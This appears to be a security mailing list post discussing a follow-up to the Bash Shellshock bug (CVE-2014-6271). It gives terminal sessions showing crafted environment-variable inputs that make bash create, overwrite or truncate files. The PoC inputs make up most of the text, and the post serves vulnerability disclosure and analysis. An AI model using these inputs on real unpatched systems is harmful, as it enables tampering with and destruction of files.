Eric Blake wrote:
> https://bugzilla.redhat.com/show_bug.cgi?id=1141597 describes this bug
> (aka CVE-2014-6271), and points out that even _with_ this patch, there
> is still a flaw that attackers can use to overwrite portions of the
> filesystem, which is also a possible exploitation avenue:
>
> $ ls -l date
> ls: cannot access date: No such file or directory
> $ env -i X='() { (a)=>\' bash -c 'date'
> bash: X: line 1: syntax error near unexpected token `='
> bash: X: line 1: `'
> bash: error importing function definition for `X'
> $ ls -l date
> -rw-------. 1 taviso taviso 0 Sep 24 14:06 date
It doesn't just create 0-sized files:
$ echo "{ echo 'Hello World' }" > foo.sh
$ VAR='() { (a) =>\' bash foo.sh
bash: VAR: line 1: syntax error near unexpected token `='
bash: VAR: line 1: `'
bash: error importing function definition for `VAR'
$ cat {
Hello World }
OTOH, had we used bash -c foo.sh, it would have removed the script
contents (truncated to 0 bytes).
